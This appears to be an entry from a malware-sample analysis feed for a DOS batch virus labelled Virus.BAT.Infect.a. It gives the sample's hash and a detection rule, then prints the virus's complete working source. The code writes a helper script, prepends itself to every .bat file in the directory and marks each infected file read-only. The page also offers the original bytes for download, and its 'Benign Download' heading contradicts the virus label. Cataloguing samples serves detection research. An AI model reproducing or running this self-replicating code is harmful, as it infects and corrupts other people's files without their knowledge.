Benign Download

Virus.BAT.Infect.a

Batch file generation via echo
SHA-2566a7c8c4334ec8dadbcac562a22fce3b64f45dc5876310f294c30b1c8d34d66f9
MaleculeO(C)

Evidence

Batch file generation via echo lines 1–16
1
2
3
4@ctty nul
5echo if [%%1]==[INFECT.BAT] goto fuckit > infect.bat
6echo del something.tmp >> infect.bat
7echo copy /b %%1 something.tmp >> infect.bat
8echo del %%1 >> infect.bat
9echo copy /b %0 + %0.bat + something.tmp %%1 >> infect.bat
10echo del something.tmp >> infect.bat
11echo attrib +r %%1 >> infect.bat
12echo :fuckit >> infect.bat
13for %%f in (*.bat) do call infect.bat %%f
14del infect.bat
15ctty con
16

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.